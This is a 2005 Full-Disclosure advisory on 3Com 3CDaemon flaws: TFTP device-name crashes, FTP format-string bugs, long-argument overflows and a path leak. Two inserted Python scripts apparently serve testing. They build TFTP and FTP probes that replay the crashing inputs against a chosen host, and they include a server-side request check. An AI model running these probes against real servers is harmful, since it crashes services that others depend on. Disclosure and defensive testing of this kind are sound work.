[Full-Disclosure] 3Com 3CDaemon Multiple Vulnerabilities

From: Sowhat . (smaillist_at_gmail.com)
Date: 01/04/05

    Date: Tue, 4 Jan 2005 18:23:06 +0800
    To: bugtraq@securityfocus.com, full-disclosure@lists.netsys.com
    
    

    3Com 3CDaemon Multiple Vulnerabilities

    By Sowhat
    04.JAN.2005

    http://secway.org/advisory/ad20041011.txt
    [I.T.S] Security Research Team

    Product Affected:

    3Com 3CDaemon 2.0 revision 10

    Vendor:

    www.3Com.com

    (1) BACKGROUND

    3CDaemon is a free and popular TFTP, FTP, and Syslog daemon for Microsoft Windows
    platforms, developed by dan_gill@3Com.

    For more information:
    http://support.3com.com/software/utilities_for_windows_32_bit.htm
    ftp://ftp.3com.com/pub/utilbin/win32/3cdv2r10.zip

    3CDaemon is full of holes. ISS and Wang Ning <nwang@scn.com.cn> have already
    reported some bugs in 3CDaemon (see:
    http://xforce.iss.net/xforce/xfdb/8970
    http://www.securityfocus.org/bid/11944
    ).

    Here I document some other well-known bugs again. :)

    (2) Details

    Remote exploitation of multiple vulnerabilities in 3CDaemon allows attackers
    to execute arbitrary code as the user running 3CDaemon (usually
    Administrator). Some of these vulnerabilities do not require a valid username
    and password to log in.

    There are several vulnerabilities:

    1. TFTP Reserved Device Name Denial of Service

    Requesting a Windows reserved device name (here prn, the printer device) over
    TFTP crashes the daemon:

    D:\WINDOWS\system32>tftp -i 192.168.0.1 get prn

    3CDaemon dies with a Visual C++ runtime error dialog:
    "Microsoft Visual C++ Runtime library"
    "Runtime Error!"
    "Program : C:\Program Files\3Com\3CDaemon\3CDaemon.exe "
    "abnormal program termination"
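    The request above on the wire, as an added example (this is not code from the advisory or from 3Com): `tftp -i host get prn` sends an RFC 1350 read request, opcode 1 followed by the filename, a NUL, the mode "octet" and a NUL. The script below builds and parses such packets, includes a probe that sends one and reports whether the daemon still answers, and shows the server-side check that would have prevented the crash: refusing any path component that names a Windows device (CON, PRN, AUX, NUL, COM1-9, LPT1-9, with or without an extension). The same check closes the `cd aux` path leak in item 6. The host, port and timeout values are assumptions, and the packet bytes used offline are constructed.

```python
import re
import socket
import struct
import sys

# Windows reserved device names. A request for one of these is routed to the
# device driver instead of a file, which is what crashes 3CDaemon in item 1
# and leaks the install path in item 6.
RESERVED_DEVICES = (
    {"CON", "PRN", "AUX", "NUL"}
    | {f"COM{i}" for i in range(1, 10)}
    | {f"LPT{i}" for i in range(1, 10)}
)

TFTP_MODES = ("netascii", "octet", "mail")


def is_reserved_device_name(path: str) -> bool:
    """True if any path component names a Windows device.

    Windows matches case-insensitively and ignores an extension
    ("prn.txt" still opens the printer), so both spellings are caught.
    """
    for component in re.split(r"[\\/]", path):
        stem = component.split(".", 1)[0].strip().upper()
        if stem in RESERVED_DEVICES:
            return True
    return False


def build_rrq(filename: str, mode: str = "octet") -> bytes:
    """Encode an RFC 1350 read request: opcode 1, filename, NUL, mode, NUL."""
    return (struct.pack("!H", 1) + filename.encode("latin-1") + b"\x00"
            + mode.encode("ascii") + b"\x00")


def parse_request(pkt: bytes):
    """Decode an RRQ/WRQ into (opcode, filename, mode); ValueError if malformed."""
    if len(pkt) < 4:
        raise ValueError("short packet")
    opcode = struct.unpack("!H", pkt[:2])[0]
    if opcode not in (1, 2):
        raise ValueError(f"opcode {opcode} is not a request")
    fields = pkt[2:].split(b"\x00")
    # filename, mode, then an empty trailer; RFC 2347 options may follow the mode.
    if len(fields) < 3 or fields[-1] != b"":
        raise ValueError("missing NUL terminators")
    return opcode, fields[0].decode("latin-1"), fields[1].decode("latin-1").lower()


def vet_request(pkt: bytes) -> str:
    """Server-side gate: 'ok' or the reason the request must be refused."""
    try:
        _, filename, mode = parse_request(pkt)
    except ValueError as e:
        return f"refuse: malformed ({e})"
    if mode not in TFTP_MODES:
        return "refuse: unknown mode"
    parts = re.split(r"[\\/]", filename)
    if filename.startswith(("/", "\\")) or ".." in parts or ":" in filename:
        return "refuse: path escapes root"
    if is_reserved_device_name(filename):
        return "refuse: reserved device name"
    return "ok"


def probe_tftp(host: str, filename: str, port: int = 69, timeout: float = 3.0) -> str:
    """Send one RRQ and report what came back (network helper, not run offline).

    host/port/timeout are caller assumptions; the daemon on the page listened on 69.
    """
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(build_rrq(filename), (host, port))
        try:
            data, _ = s.recvfrom(516)           # largest DATA packet: 4 + 512 bytes
        except OSError:                         # timeout or ICMP port unreachable
            return "no reply: daemon down, port closed, or silently dropping"
    opcode = struct.unpack("!H", data[:2])[0]
    return {3: "DATA", 5: "ERROR"}.get(opcode, f"opcode {opcode}")


if __name__ == "__main__":
    # Usage: python tftp_probe.py <host> [name]   (default name: prn, as on the page)
    print(probe_tftp(sys.argv[1], sys.argv[2] if len(sys.argv) > 2 else "prn"))
```

    Run the probe once with a harmless name to confirm the daemon answers with DATA or ERROR, then with prn; a second harmless request that now times out is the crash. A daemon that passes every request through vet_request() never hands a device name to the file API.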

    2. FTP Username Format String Vulnerability

    The USER argument is evaluated as a format string. With "%n" the connection
    dies at once:

    H:\>ftp 192.168.0.1
    Connected to 192.168.0.1.
    220 3Com 3CDaemon FTP Server Version 2.0
    User (192.168.0.1:(none)): %n
    Connection closed by remote host.

    Or, with "%s", the login dialogue completes first:

    H:\>ftp 192.168.0.1
    Connected to 192.168.0.1.
    220 3Com 3CDaemon FTP Server Version 2.0
    User (192.168.0.1:(none)): %s
    331 User name ok, need password
    Password:[anythinghere]
    530 Login access denied
    Login failed.
    ftp>

    After either exchange, 3CDaemon is dead.

    3. FTP Long Username Buffer Overflow

    D:\WINDOWS\system32>ftp 192.168.0.1
    Connected to 192.168.0.1.
    220 3Com 3CDaemon FTP Server Version 2.0
    User (192.168.0.1:(none)):
    501 Invalid or missing parameters
    Login failed.
    ftp> user AAA..[about 241 A here]...AAAAA
    Connection closed by remote host.

    4. Multiple FTP Command Long Parameter Buffer Overflow
    Affected commands include cd, send, ls, put, delete, rename, rmdir, literal,
    stat, CWD, and so on. (This is probably what ISS's advisory is talking about.)

    ftp> cd AAA..[about 398 A here]...AAAAA
    Connection closed by remote host.
    ftp>

    ftp> ls AAA..[about 247 A here]...AAAAA
    200 PORT command successful.
    Connection closed by remote host.

    ftp> put 1.txt AAA..[about 247 A here]...AAAAA
    200 PORT command successful.
    532 Need account for storing files
    Connection closed by remote host.

    The number of "A"s needed differs from command to command.

    5. Multiple FTP Command Format String
    Affected commands include cd, delete, rename, rmdir, literal, stat, CWD, and
    so on. Here the session is already logged in:

    230 User logged in
    ftp> cd %n
    Connection closed by remote host.
    ftp>

    6. Multiple FTP Command Reserved Device Name Information Leak
    Affected commands include cd, and so on.

    The following commands disclose the physical installation path of 3CDaemon:

    ftp> cd aux
    550 aux : C:/3cdaemon/aux is not a directory!
    ftp> cd lpt1
    550 lpt1 : C:/3cdaemon/lpt1 is not a directory!

    CD to an existing filename discloses the physical path too:

    ftp> cd toolz.rar
    550 toolz.rar : C:/3cdaemon/toolz.rar is not a directory!
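    A probe harness for items 2 through 6, added here as an example and not part of the advisory or of 3CDaemon. It replays each input reported above (the "%n" and "%s" directives, the 241-, 398- and 247-byte arguments, and CWD aux) on a fresh connection per probe, because a crashed daemon drops the old one, and classifies what comes back: a dropped connection or silence is a crash candidate, and a reply echoing a drive-letter path is the item 6 disclosure. The anonymous credentials used for the post-login probes, port 21 and the timeout are assumptions; the replies checked offline are constructed from the transcripts above.

```python
import re
import socket
import sys

CRLF = b"\r\n"
# A drive-letter path such as C:/3cdaemon/aux inside a reply (item 6).
WIN_PATH = re.compile(r"[A-Za-z]:[\\/]\S*")


def build_probes(user_len: int = 241, cwd_len: int = 398, arg_len: int = 247):
    """One probe per finding on the page: (label, needs_login, command).

    The argument lengths default to the ones reported in items 3 and 4.
    """
    pad = lambda n: b"A" * n
    return [
        ("USER %n (item 2, format string)", False, b"USER %n"),
        ("USER %s (item 2, format string)", False, b"USER %s"),
        ("USER long argument (item 3)", False, b"USER " + pad(user_len)),
        ("CWD long argument (item 4)", True, b"CWD " + pad(cwd_len)),
        ("LIST long argument (item 4)", True, b"LIST " + pad(arg_len)),
        ("STOR long argument (item 4)", True, b"STOR " + pad(arg_len)),
        ("CWD %n (item 5, format string)", True, b"CWD %n"),
        ("CWD aux (item 6, reserved device name)", True, b"CWD aux"),
    ]


def classify_reply(reply):
    """Turn a raw reply (None if the peer vanished) into a finding class."""
    if not reply:
        return "connection dropped: crash candidate"
    code = reply[:3].decode("ascii", "replace")
    leak = WIN_PATH.search(reply.decode("latin-1"))
    if leak:
        return f"path disclosure in {code}: {leak.group(0)}"
    return f"reply {code}"


def reply_complete(buf: bytes) -> bool:
    """True once buf ends with a terminating "NNN " line ("NNN-" lines continue)."""
    if not buf.endswith(CRLF):
        return False
    last = buf[:-2].split(CRLF)[-1]
    return len(last) >= 4 and last[:3].isdigit() and last[3:4] == b" "


def recv_reply(sock):
    """Read one full FTP reply; None on EOF, reset or timeout with nothing read."""
    buf = b""
    while True:
        try:
            chunk = sock.recv(4096)
        except OSError:                      # timeout or connection reset
            return buf or None
        if not chunk:                        # orderly close
            return buf or None
        buf += chunk
        if reply_complete(buf):
            return buf


def run_probe(host, command, needs_login, user=b"anonymous", password=b"x@y",
              port=21, timeout=5.0):
    """Fresh connection per probe (a crashed daemon drops the old one), then send.

    Credentials, port and timeout are assumptions, not values from the page.
    """
    with socket.create_connection((host, port), timeout) as s:
        if recv_reply(s) is None:            # no 220 banner: already dead
            return None
        if needs_login:
            for line in (b"USER " + user, b"PASS " + password):
                s.sendall(line + CRLF)
                reply = recv_reply(s)
                if reply is None:
                    return None
            if not reply.startswith(b"230"):  # login refused: report that reply instead
                return reply
        s.sendall(command + CRLF)
        return recv_reply(s)


if __name__ == "__main__":
    # Usage: python ftp_probe.py <host>
    for label, needs_login, cmd in build_probes():
        try:
            reply = run_probe(sys.argv[1], cmd, needs_login)
        except OSError as e:                 # refused: the previous probe took it down
            print(f"{label}: connect failed ({e})")
            break
        print(f"{label}: {classify_reply(reply)}")
```

    Because the first successful crash ends the run, restart the daemon between probes (or run one label at a time) to attribute each crash to a single input; a "reply 530" line on a post-login probe means the assumed credentials were refused and the probe was never sent.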

    There are still some other boring bugs, but this is enough. :>

    (3) WORKAROUND

    Workaround? None.

    (4) Vendor Response

    Since 3Com apparently has not maintained 3CDaemon for a long, long time, I did
    not contact them. :)

    http://secway.org
    Thanks to all the members of the ITS Security Team
    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html

